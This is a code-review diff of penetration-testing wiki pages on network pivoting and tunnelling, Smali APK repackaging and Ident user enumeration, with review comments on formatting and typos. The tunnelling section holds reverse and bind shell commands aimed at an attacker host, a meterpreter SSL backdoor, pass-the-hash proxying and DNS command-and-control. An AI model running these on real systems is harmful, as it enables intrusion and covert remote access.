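Review bot: the heading demotions (`# **SSH**` to `## **SSH**`, `## Local Port2Port` to `### Local Port2Port`) correctly leave the page title as the only H1. On the unchanged `ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1` line, the comment "accessible in port 10521 from everywhere" only holds when sshd on 10.0.0.1 has `GatewayPorts yes` (or `clientspecified`); with the default `GatewayPorts no` the remote forward binds to loopback regardless of the `0.0.0.0` prefix, so that prerequisite belongs in the prose next to the `PermitRootLogin`/`PermitTunnel` requirements stated later in the hunk.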
@ -37,9 +43,9 @@ ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in
ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere
``` ```
## Port2Port ### Port2Port
Local port --&gt; Compromised host \(SSH\) --&gt; Third\_box:Port Local port --> Compromised host (SSH) --> Third\_box:Port
```bash ```bash
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
@ -47,18 +53,18 @@ ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_po
sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised> sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised>
``` ```
## Port2hostnet \(proxychains\) ### Port2hostnet (proxychains)
Local Port --&gt; Compromised host \(SSH\) --&gt; Wherever Local Port --> Compromised host (SSH) --> Wherever
```bash ```bash
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy) ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
``` ```
## VPN-Tunnel ### VPN-Tunnel
You need **root in both devices** \(as you are going to create new interfaces\) and the sshd config has to allow root login: You need **root in both devices** (as you are going to create new interfaces) and the sshd config has to allow root login:\
`PermitRootLogin yes` `PermitRootLogin yes`\
`PermitTunnel yes` `PermitTunnel yes`
```bash ```bash
@ -76,13 +82,13 @@ iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE
Set new route on client side Set new route on client side
```text ```
route add -net 10.0.0.0/16 gw 1.1.1.1 route add -net 10.0.0.0/16 gw 1.1.1.1
``` ```
# SSHUTTLE ## SSHUTTLE
You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host. You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.\
Example, forwarding all the traffic going to 10.10.10.0/24 Example, forwarding all the traffic going to 10.10.10.0/24
```bash ```bash
@ -90,18 +96,18 @@ pip install sshuttle
sshuttle -r user@host 10.10.10.10/24 sshuttle -r user@host 10.10.10.10/24
``` ```
# Meterpreter ## Meterpreter
## Port2Port ### Port2Port
Local port --&gt; Compromised host \(active session\) --&gt; Third\_box:Port Local port --> Compromised host (active session) --> Third\_box:Port
```bash ```bash
# Inside a meterpreter session # Inside a meterpreter session
portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host> portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>
``` ```
## Port2hostnet \(proxychains\) ### Port2hostnet (proxychains)
```bash ```bash
background# meterpreter session background# meterpreter session
@ -126,22 +132,22 @@ run #Proxy port 1080 by default
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
``` ```
# reGeorg ## reGeorg
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
You need to upload a web file tunnel: ashx\|aspx\|js\|jsp\|php\|php\|jsp You need to upload a web file tunnel: ashx|aspx|js|jsp|php|php|jsp
```bash ```bash
python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
``` ```
# Chisel ## Chisel
You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\
You need to use the **same version for client and server** You need to use the **same version for client and server**
## socks ### socks
```bash ```bash
./chisel server -p 8080 --reverse #Server ./chisel server -p 8080 --reverse #Server
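Review bot: the upload-type list on the reGeorg line, `ashx|aspx|js|jsp|php|php|jsp`, repeats `php` and `jsp`; since the hunk already rewrites this line to drop the backslash escapes, dedupe it to `ashx|aspx|js|jsp|php` in the same change.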
@ -149,18 +155,18 @@ You need to use the **same version for client and server**
#And now you can use proxychains with port 1080 (default) #And now you can use proxychains with port 1080 (default)
``` ```
## Port forwarding ### Port forwarding
```bash ```bash
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
``` ```
# Rpivot ## Rpivot
[https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot) [https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)
Reverse tunnel. The tunnel is started from the victim. Reverse tunnel. The tunnel is started from the victim.\
A socks4 proxy is created on 127.0.0.1:1080 A socks4 proxy is created on 127.0.0.1:1080
```bash ```bash
@ -181,37 +187,37 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45 victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45
``` ```
# **Socat** ## **Socat**
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
## Bind shell ### Bind shell
```bash ```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337 attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
``` ```
## Reverse shell ### Reverse shell
```bash ```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
``` ```
## Port2Port ### Port2Port
```bash ```bash
socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> & socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
``` ```
## Port2Port through socks ### Port2Port through socks
```bash ```bash
socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
``` ```
## Meterpreter through SSL Socat ### Meterpreter through SSL Socat
```bash ```bash
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that port #Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
@ -231,7 +237,7 @@ OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacke
[https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/) [https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/)
## SSL Socat Tunnel ### SSL Socat Tunnel
**/bin/sh console** **/bin/sh console**
@ -251,9 +257,9 @@ attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=cli
victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt
``` ```
## Remote Port2Port ### Remote Port2Port
Connect the local SSH port \(22\) to the 443 port of the attacker host Connect the local SSH port (22) to the 443 port of the attacker host
```bash ```bash
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
@ -261,9 +267,9 @@ victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Esta
attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim
``` ```
# Plink.exe ## Plink.exe
It's like a console PuTTY version \( the options are very similar to a ssh client\). It's like a console PuTTY version ( the options are very similar to a ssh client).
As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine: As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine:
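Review bot: the reflowed Plink line keeps a stray space after the opening parenthesis, "( the options are very similar to a ssh client)", and the following context line has "a only locally accessible port"; suggest "(the options are very similar to an ssh client)" and "a port that is only reachable locally".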
@ -272,23 +278,23 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
``` ```
# NTLM proxy bypass ## NTLM proxy bypass
The previously mentioned tool: **Rpivot** The previously mentioned tool: **Rpivot**\
**OpenVPN** can also bypass it, setting these options in the configuration file: **OpenVPN** can also bypass it, setting these options in the configuration file:
```bash ```bash
http-proxy <proxy_ip> 8080 <file_with_creds> ntlm http-proxy <proxy_ip> 8080 <file_with_creds> ntlm
``` ```
## Cntlm ### Cntlm
[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/) [http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net)
It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port. It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.\
Example that forward port 443 Example that forward port 443
```text ```
Username Alice Username Alice
Password P@ssw0rd Password P@ssw0rd
Domain CONTOSO.COM Domain CONTOSO.COM
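Review bot: "Example that forward port 443" should read "Example that forwards port 443". The config sample stores `Password P@ssw0rd` in clear text on the pivot host; cntlm accepts hashed credentials instead (`cntlm -H` prints the `PassLM`/`PassNT`/`PassNTLMv2` lines to paste into the config), which is worth one sentence here.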
@ -296,22 +302,22 @@ Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443 Tunnel 2222:<attackers_machine>:443
``` ```
Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222. Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\
You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222. You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222.
# YARP ## YARP
A reverse proxy create by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy) A reverse proxy create by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
# DNS Tunneling ## DNS Tunneling
## Iodine ### Iodine
[https://code.kryo.se/iodine/](https://code.kryo.se/iodine/) [https://code.kryo.se/iodine/](https://code.kryo.se/iodine/)
Root is needed in both systems to create tun adapters and tunnels data between them using DNS queries. Root is needed in both systems to create tun adapters and tunnels data between them using DNS queries.
```text ```
attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
victim> iodine -f -P P@ssw0rd tunneldomain.com -r victim> iodine -f -P P@ssw0rd tunneldomain.com -r
#You can see the victim at 1.1.1.2 #You can see the victim at 1.1.1.2
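Review bot: "A reverse proxy create by Microsoft" should be "created by Microsoft". The pair "Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222." is one conditional split by a full stop; join it: "Now, if you for example make the SSH service on the victim listen on port 443, you can reach it through port 2222 on the attacker machine."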
@ -319,13 +325,13 @@ victim> iodine -f -P P@ssw0rd tunneldomain.com -r
The tunnel will be really slow. You can create a compressed SSH connection through this tunnel by using: The tunnel will be really slow. You can create a compressed SSH connection through this tunnel by using:
```text ```
ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080 ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
``` ```
## DNSCat2 ### DNSCat2
Establishes a C&C channel through DNS. It doesn't need root privileges. Establishes a C\&C channel through DNS. It doesn't need root privileges.
```bash ```bash
attacker> ruby ./dnscat2.rb tunneldomain.com attacker> ruby ./dnscat2.rb tunneldomain.com
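Review bot: the iodine SSH line `ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080` is rejected by current OpenSSH clients, which removed the arcfour, blowfish and CAST ciphers in 7.6; since the point of the line is compression over a slow tunnel, drop the `-c` option (or name a still-supported cipher such as `aes128-ctr`) and confirm that `-o CompressionLevel=9`, historically a protocol-1-only option, is still accepted by the client version the page targets.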
@ -339,19 +345,19 @@ session -i <sessions_id>
listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
``` ```
### Change proxychains DNS #### Change proxychains DNS
Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** \(hardcoded\). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**. Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** (hardcoded). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**.
# Tunnels in Go ## Tunnels in Go
[https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel) [https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel)
# ICMP Tunneling ## ICMP Tunneling
## Hans ### Hans
[https://github.com/friedrich/hans](https://github.com/friedrich/hans) [https://github.com/friedrich/hans](https://github.com/friedrich/hans)\
[https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel) [https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel)
Root is needed in both systems to create tun adapters and tunnels data between them using ICMP echo requests. Root is needed in both systems to create tun adapters and tunnels data between them using ICMP echo requests.
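Review bot: in the proxychains paragraph, "tunnels tcp DNS request" should be "tunnels TCP DNS requests". The `/usr/lib/proxychains3/proxyresolv` path and the hard-coded 4.2.2.2 resolver are specific to proxychains 3; proxychains-ng, which most distributions now ship as `proxychains4`, lays its files out differently, so the paragraph should state which version the edit applies to.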
@ -362,13 +368,18 @@ Root is needed in both systems to create tun adapters and tunnels data between t
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
``` ```
# Other tools to check ## Other tools to check
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) * [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
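Review bot: `https://github.com/jpillora/chisel` is listed under "Other tools to check" although chisel already has its own `## Chisel` section above (with its socks and port-forwarding examples); drop it from this list or make the list a set of cross-references to the sections above.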
@ -385,5 +396,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

@ -1,4 +1,4 @@
# Smali - Decompiling/\[Modifying]/Compiling
<details> <details>
@ -16,16 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it. Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it.
**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html) **Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html)
# Fast Way ## Fast Way
Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command. Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command.
# Decompile the APK ## Decompile the APK
Using APKTool you can access to the **smali code and resources**: Using APKTool you can access to the **smali code and resources**:
@ -43,7 +51,7 @@ Some **interesting files you should look are**:
If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources). If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources).
# Change smali code ## Change smali code
You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\ You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\
Some **examples** can be found here: Some **examples** can be found here:
@ -53,7 +61,7 @@ Some **examples** can be found here:
Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali). Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali).
# Recompile the APK ## Recompile the APK
After modifying the code you can **recompile** the code using: After modifying the code you can **recompile** the code using:
@ -65,7 +73,7 @@ It will **compile** the new APK **inside** the _**dist**_ folder.
If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)
## **Sing the new APK** ### **Sing the new APK**
Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly): Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly):
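Review bot: the heading is demoted but its typo survives: `### **Sing the new APK**` should be `### **Sign the new APK**` (the later heading "Sign the new APK (again?)" already uses the correct spelling).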
@ -79,7 +87,7 @@ Finally, **sign** the new APK:
jarsigner -keystore key.jks path/to/dist/* <your-alias> jarsigner -keystore key.jks path/to/dist/* <your-alias>
``` ```
## Optimize new application ### Optimize new application
**zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign). **zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign).
@ -88,15 +96,15 @@ zipalign [-f] [-v] <alignment> infile.apk outfile.apk
zipalign -v 4 infile.apk zipalign -v 4 infile.apk
``` ```
## **Sign the new APK (again?)** ### **Sign the new APK (again?)**
If you **prefer** to use \[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). If you **prefer** to use \[**apksigner**]\([**https://developer.android.com/studio/command-line/apksigner**](https://developer.android.com/studio/command-line/apksigner))\*\* instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling\*\*. BUT NOTICE THAT\*\* YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling).
```bash ```bash
apksigner sign --ks key.jks ./dist/mycompiled.apk apksigner sign --ks key.jks ./dist/mycompiled.apk
``` ```
# Modifying Smali ## Modifying Smali
For the following Hello World Java code: For the following Hello World Java code:
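Review bot: the apksigner paragraph comes out of this hunk more broken than it went in: the escaped link `\[**apksigner**]\([**https://developer.android.com/studio/command-line/apksigner**](…))\*\*` no longer renders as a link and the trailing `\*\*` show up literally. Rewrite the line as plain markdown and fix its typos ("sing", "zipaling", "APPLCIATION", "aspsigner") in the same pass: "If you **prefer** to use [**apksigner**](https://developer.android.com/studio/command-line/apksigner) instead of jarsigner, **you should sign the apk** after applying **the optimization with zipalign**. BUT NOTICE THAT YOU ONLY HAVE TO SIGN THE APPLICATION ONCE: WITH jarsigner (before zipalign) OR WITH apksigner (after zipalign)."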
@ -120,9 +128,9 @@ The Smali code would be:
The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions). The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions).
## Light Changes ### Light Changes
## Modify initial values of a variable inside a function ### Modify initial values of a variable inside a function
Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones: Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones:
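Review bot: `### Light Changes` and `### Modify initial values of a variable inside a function` end up at the same level, yet the second (and `### Basic Operations` below it) are the light changes; the same holds for `### Bigger Changes` versus `### Logging` and `### Toasting` in the later hunk. Demote the child sections to `####` so the outline reflects the grouping the headings describe.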
@ -134,7 +142,7 @@ const/4 v8, 0x1
const-string v5, "wins" const-string v5, "wins"
``` ```
## Basic Operations ### Basic Operations
``` ```
#Math #Math
@ -159,9 +167,9 @@ if-ne v0, v9, :goto_6 #If not equals, go to: :goto_6
goto :goto_6 #Always go to: :goto_6 goto :goto_6 #Always go to: :goto_6
``` ```
## Bigger Changes ### Bigger Changes
## Logging ### Logging
``` ```
#Log win: <number> #Log win: <number>
@ -180,7 +188,7 @@ Recommendations:
* The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0). * The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0).
* Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_. * Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_.
## Toasting ### Toasting
Remember to add 3 to the number of _.locals_ at the begging of the function. Remember to add 3 to the number of _.locals_ at the begging of the function.
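Review bot: the unchanged line after `### Toasting`, "at the begging of the function", should read "at the beginning of the function".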
@ -198,6 +206,12 @@ move-result-object v12
invoke-virtual {v12}, Landroid/widget/Toast;->show()V invoke-virtual {v12}, Landroid/widget/Toast;->show()V
``` ```
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -214,5 +228,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

@ -1,4 +1,4 @@
# 113 - Pentesting Ident
<details> <details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Basic Information {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) connection. ## Basic Information
Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol\_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection.
**Default port:** 113 **Default port:** 113
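Review bot: the rewritten sentence still has no subject: "Is an Internet protocol that helps identify…" should read "Ident is an Internet protocol that helps identify the user of a particular TCP connection." The `\_` escaping this hunk introduces inside the link targets (`Protocol\_\(computing\)`, `Transmission\_Control\_Protocol`) is GitBook's serialization; confirm the two Wikipedia links still resolve after the round-trip.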
@ -28,9 +34,9 @@ PORT STATE SERVICE
113/tcp open ident 113/tcp open ident
``` ```
# **Enumeration** ## **Enumeration**
## **Manual - Get user/Identify the service** ### **Manual - Get user/Identify the service**
If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing: If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing:
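Review bot: "If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing:" is one conditional cut in two; join it with a comma: "…connected to samba using port 43218, you can find out which user is running the samba service by doing:".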
@ -44,7 +50,7 @@ Other errors:
![](<../.gitbook/assets/image (17).png>) ![](<../.gitbook/assets/image (17).png>)
## Nmap ### Nmap
By default (-sC) nmap will identify every user of every running port: By default (-sC) nmap will identify every user of every running port:
@ -63,7 +69,7 @@ PORT STATE SERVICE VERSION
|_auth-owners: root |_auth-owners: root
``` ```
## Ident-user-enum ### Ident-user-enum
Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`.
@ -77,15 +83,15 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.1.100:445 root 192.168.1.100:445 root
``` ```
## Shodan ### Shodan
* `oident` * `oident`
# Files ## Files
identd.conf identd.conf
# HackTricks Automatic Commands ## HackTricks Automatic Commands
``` ```
Protocol_Name: Ident #Protocol Abbreviation if there is one. Protocol_Name: Ident #Protocol Abbreviation if there is one.
@ -106,6 +112,12 @@ Entry_2:
Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports) Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports)
``` ```
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -122,5 +134,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
